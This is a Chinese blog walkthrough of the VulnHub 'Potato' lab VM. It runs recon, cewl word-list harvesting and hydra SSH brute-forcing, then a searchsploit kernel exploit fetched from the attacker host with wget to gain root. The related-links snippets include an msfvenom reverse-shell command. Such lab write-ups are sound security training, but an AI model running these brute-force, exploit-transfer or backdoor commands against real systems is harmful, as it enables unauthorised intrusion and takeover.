靶机(potato-suncsr)——ssh暴力破解(工具包括:cewl(爬虫)、hydra(九头蛇)、nmap、arp-scan、dirsearch)

已于 2023-12-12 15:13:23 修改
阅读量2.3k 收藏 25
点赞数 7
文章标签: ssh linux 运维
于 2023-04-11 13:06:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_71274136/article/details/129986796
版权

目录

1.靶机的安装和准备

 2.kali准备

1)网络选择nat

2)二层广播扫描——arp-scan

 3.获取客户端开启的服务

4.看http服务有没有可利用的信息

5.准备爬取网页信息,获取用户名称(为暴力破解做准备)

6.暴力破解

​编辑

7.远程登陆

id是为了查看是否与root在同一个组,是的话可以直接做坏事

(root的的id为用户id=0(root) 组id=0(root) 组=0(root))

8.查版本信息——找版本漏洞

 9.使用合适漏洞

第一次使用靶机,很好玩,我感觉靶机就是有漏洞的一个虚拟机,你可以在vmware里打开,然后用kali攻击,获取权限,或者盗取信息

链接: https://pan.baidu.com/s/1KFYQkEP_KAr3lJZOfQ2-Ig?pwd=2cbh 提取码: 2cbh 复制这段内容后打开百度网盘手机App,操作更方便哦

链接已更新(2023.12.12)

链接:https://pan.baidu.com/s/1zwRmLeXFALqtzTRmfki_Kw?pwd=tpb1 
提取码:tpb1

开始正题

1.靶机的安装和准备

下载好后打开vmware

靶机不建议下载到c盘,他很占硬盘空间(运行之后)

 导入完成后就看见了,启动他

 

 就长这样

然后对靶机的网路进行更改,选择nat

 然后就先不用管他了

 2.kali准备

1)网络选择nat

去看网络配置文件

dns写不写都行,保存退出

2)二层广播扫描——arp-scan

arp-scan -T4(把风险等级提升到4,但可能会判刑) -A(忘了) -p(指定端口)

arp-scan -l

#-l是指从网络接口配置生成地址,所以才会有192.168.10.0网段的所有地址(还包括自己的ip)

192.168.10.1是自己192.168.10.253和192.168.10.254是vmware的两个网卡(都可以手动设置),不用管。

192.168.253和192.168.10.254在这里看

 这个图是kali的IP来源以及ip的部分信息,看mac确认的。

 这不知道是什么~~~第一个我也看了192.168.56.0网段的,不知道干啥的

10.6是靶机的ip

 3.获取客户端开启的服务

nmap -sV -A 192.168.10.6 -p 0-65535

-sV表示查看服务版本信息和端口, -A表示目标ip address -p表示指定端口

 注意ssh的默认端口号是22,这里变成了7120,这个很关键,一会用

4.看http服务有没有可利用的信息

目的:查看客户端有什么可以访问的网页,这里我们使用dirsearch工具

dirsearch -u 192.168.10.6

#-u指的是url,必须写,因为

4**开头的,一般是客户端出问题了

5**开头的,是服务器出问题了

3开头是文件跳转

2**开头是正常的

 下面有两个正常的,我们依次访问,用火狐浏览器访问,在地址栏里输入ip加文件名字就行

 index.html里就一个图片,按f12后也没看出什么有价值的信息

info.php——相当于是php文件里写了一个内置函数phpinfo()

 可以获取到客户端的版本信息,没什么用

以下目的相同,可跳过进行下一步了

 同样的工具有:dirb和gobuster dir -u

dirb http://192.168.10.6

gobuster 还没教,以后补充,嘿嘿。

5.准备爬取网页信息,获取用户名称(为暴力破解做准备)

cewl http://192.168.10.6/ -w /python/1.txt

#-w表示指定保存到文件1.txt

 去看我1.txt文件里有啥

4个用户名,因为默认首字母大写,所以用户名可能首字母小写

6.暴力破解

盲猜一波用户名叫potato

hydra -l potato -P 2.txt ssh://192.168.10.6:7120

2.txt的内容在这: 链接: https://pan.baidu.com/s/11ne6U42qEjR2_GJFavnRwg?pwd=b8i7 提取码: b8i7 复制这段内容后打开百度网盘手机App,操作更方便哦

结果就是用户名叫potato,密码是letmein

7.远程登陆

ssh potato@192.168.10.6 -p 7120  

id是为了查看是否与root在同一个组,是的话可以直接做坏事

(root的的id为用户id=0(root) 组id=0(root) 组=0(root))

uname -a 查版本信息,这个版本信息在info.php里也有哦

8.查版本信息——找版本漏洞

我们另开一个终端

两种方式

searchsploit ubuntu 3.13.0 #直接了当

searchsploit Privilege | grep -i linux | grep 3.13.0

#Privilege权限|找包含不分大小写的linux的信息|找版本为3.13.0的信息

建议:屏幕缩小,信息显示的全ctrl+加号

方法1: 

方法2:

 9.使用合适漏洞

这里我们使用第一个漏洞。第一个漏洞的作用是提升权限,而配置文件和解释文件在linux/local/37292.c这个地方,我们进行查找位置

locate 37292.c

 

注意:locate命令查找文件在数据库中查找,查找的速度非常快,几乎是马上列出结果;而find命令查找时则是直接查找硬盘上的文件,查找的速度相应的非常慢。

find -name 37292.c

为了防止不破坏文件,我们进行cp

 

 为了把文件传输到靶机里,我们使用http服务,ftp能用,但不知道kali配置了没,但apachekali自带的有,可以直接使用。

开启服务

systemctl restart apache2 

 然后回到已经登陆到靶机的终端,输入

cd tmp

wget http://192.168.10.5/exp.c

 查看是否成功,这里我测试了一下,这个exp.c的权限和传输前的权限没有关系

 我们看看文件的使用方法

打开exp.c文件

 按找方法进行使用

 出现#,表示我们成功了!!!!

查看id,我喜欢改密码,顺便改了一下root的密码

成功后我们去找flag

一大口木
关注
两款SSH爆破工具的介绍:hydra+medusa
William234的博客
03-20 9559
两款SSH爆破工具的介绍:hydra+me...
ssh暴力破解主机密码
08-09
ssh暴力破解windows服务器密码,绝对详细的教程,立即可以使用
VulnHub-Potato (SunCSR)靶场
最新发布
m0_74631795的博客
08-12 498
在 Kali Linux 中,searchsploit 是一个非常有用的命令行工具,它允许用户快速搜索 Exploit Database 上的漏洞利用代码。Exploit Database 是一个庞大的、不断更新的数据库,其中包含了各种漏洞的利用代码和相关信息。searchsploit -m 命令是用来下载 Exploit Database 中的特定漏洞利用代码到本地系统的。当你使用 -m 参数时,它会下载与搜索结果相关的整个文件,而不仅仅是显示信息。因为不知道密码,所以用大写参数,后面跟密码字典路径。
Shreder:线程SSH协议密码爆破工具
weixin_43977912的博客
10-08 1065
关于Shreder Shreder是一款功能强大的多线程SSH协议密码爆破工具,广大研究人员可以使用Shreder对SSH协议的安全性进行探究。 功能介绍 能够快速执行密码爆破,每个密码仅需1秒; 经过优化处理,支持大型密码字典,Shreder尝试1000个密码仅需1分40秒; 简单的命令行接口和API使用方法; 工具安装 由于Shreder使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广大研究人员可以使用下列命令下载并安装Shreder: pip3 install
SSH暴力破解
xigua2540的博客
06-12 2473
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.10.224 lport=4444 -f elf -o shell //后门名称是shell,反弹到192.168.10.224的4444端口。少部分攻击是针对 tomcat、postgres、 hadoop、 mysql、apache、ftpuser、vnc等Linux 服务器上常见应用程序使用的用户名。SSH基于用户名密码的身份验证,容易遭受密码暴力破解攻击;
【WEB_脚本开发】简易SSH爆破工具
HWHXY的博客
03-09 709
https://github.com/hwhxy/sshCrack
拒绝ssh远程暴力破解
热门推荐
gammey的博客
05-22 2万+
拒绝ssh远程暴力破解简介在网络技术日益发展的今天,网络上的安全问题日益严重。当你在公网上使用Linux服务器时,很有可能你的服务器正在遭受ssh暴力破解。曾经有一次我的同伴将给客户提供监控服务的服务器架设在公共网络上,同时设置了弱密码。没过一天,客户的内网出现了严重的问题。我们用了一晚上在研究网络上的问题,结果最后发现就是因为这台新创建的服务器导致客户内网瘫痪,而服务器是被黑客通过ssh暴力破解...
PotatoSunscr靶机渗透攻略 ----------hydra暴力破解实战训练
z2560088的博客
09-21 870
准备工作 靶机下载 ​​​​​​https://www.vulnhub.com/entry/potato-suncsr-1,556/ 可用迅雷下载,也可以点第二个直接下载 下载后添加至虚拟机,设置网卡为NAT模式 攻击机:kali虚拟机 网卡为NAT模式 ip地址为192.168.160.129 开始攻击 扫描当前网段下存活主机 nmap -sV 192.168.160.0/24 或者 arp-scan -l 可确定靶机IP为192.168.160.13...
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu)
02-18
渗透测试模拟实战——暴力破解、写入ssh公钥留后门、植入GPU WK程序(靶机系统:ubuntu),真实有效,如有侵权,请联系csdn删除即可
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机系列:De-ICE: S1.120
01-09
文章目录靶机地址靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址 https://www.vulnhub.com/entry/de-ice-s1120,10/ 靶机设置 靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有...
ssh爆破工具hydra.zip
04-27
ssh爆破工具hydra.zip
Kali下ssh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士
01-26
来源:漏洞银行大咖面对面一周大咖秀3 作者:屌丝绅士
Kali渗透测试工具库(三)hydra——密码暴力破解工具
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
08-21 4127
工具简介 hydra是著名黑客组织thc的一款开源的暴力破解密码工具,功能非常强大,kali下是默认安装的,几乎支持所有协议的在线破解。密码能否破解,在于字典是否强大。本文仅从安全角度去讲解工具的使用,请勿用于非法用途。 使用方法 语法:Hydra 参数 IP 服务 参数: -l login 小写,指定用户名进行破解 -L file 大写,指定用户的用户名字典 -p pass 小写,用于指定密码破解,很少使用,一般采用密码字典。 -P file 大写,用于指定密码字典。 -e ns 额外的选项,
知了堂|Linux实战篇:SSH暴力破解
qq_35254085的博客
07-12 961
0x00 前言 SSH 是目前较可靠,专为远程登录会话和其他网络服务提供安全性的协议,主要用于给远程登录会话数据进行加密,保证数据传输的安全。SSH口令长度太短或者复杂度不够,如仅包含数字,或仅包含字母等,容易被攻击者破解,一旦被攻击者获取,可用来直接登录系统,控制服务器所有权限。 0x01 应急场景 某天,网站管理员登录服务器进行巡检时,发现端口连接里存在两条可疑的连接记录,如下图: TCP初始化连接三次握手吧:发SYN包,然后返回SYN/ACK包,再发ACK包,连接正式建立。但是这里有点出入,当请求
Web安全和渗透测试有什么关系?
Python_0011的博客
03-31 1244
做渗透测试的一个环节就是测试web安全,需要明白漏洞产生原理,通过信息收集互联网暴露面,进行漏洞扫描,漏洞利用,必要时进行脚本自编写和手工测试,力求挖出目标存在的漏洞并提出整改建议,当然如果技术再精一些,还要学习内网渗透(工作组和域环境),白盒审计,app,小程序渗透那些了......可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。总之,web安全包含于渗透测试,但不是渗透测试的全部。
Linux 主机ssh远程连接暴力破解详解】
qq_55213436的博客
11-30 1万+
昨天,安全老师布置了一个安全的小作业,在下想了想,做什么好呢?最近学了很多。那就做一个Linux主机远程连接的暴力破解密码的作业。读者请看好,不要睁开你的双杆。 ...
Linuxhydra的使用
Tobiubiu
07-25 1922
Syntax:  hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] Parameter: -R 继续从上一次进度接着破解 -S 大写,采
SSH暴力破解工具
Jian Sun_的博客
05-21 1865
这篇是写常见的暴力破解工具,下篇写如何防御。 hydra(海德拉) 在线爆破https://blog.csdn.net/weixin_43039349/article/details/89323846 medusa(美杜莎) 美杜莎操作说明https://blog.csdn.net/u010984277/article/details/50792816/ BrutesPray BrutesPray爆破https://blog.csdn.net/weixin_42299610/a...
评论 16
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值